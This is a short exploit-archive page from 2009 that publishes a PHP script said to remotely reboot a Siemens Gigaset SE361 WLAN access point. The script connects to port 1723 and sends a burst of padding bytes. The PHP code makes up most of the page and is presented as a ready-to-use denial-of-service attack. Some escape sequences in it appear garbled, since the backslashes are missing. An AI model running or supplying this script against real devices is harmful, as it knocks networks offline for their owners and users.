Siemens Gigaset SE361 WLAN Remote Reboot Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Siemens Gigaset SE361 WLAN Remote Reboot Exploit
# Published : 2009-09-11
# Author : crashbrz
# Previous Title : FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)
# Next Title : jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC

Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP.
It takes a few bytes for the AP to automatically restart

<?php
$apaddr = "192.168.2.1";
$apport="1723";


$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
    echo "$errstr ($errno)<br />n";
} else {
    $trash = str_repeat("x90","261");
    fwrite($con, $trash);
    while (!feof($con)) {
        echo "$trash rn";
    }
    fclose($con);
}
?> 

# www.Syue.com [2009-09-11]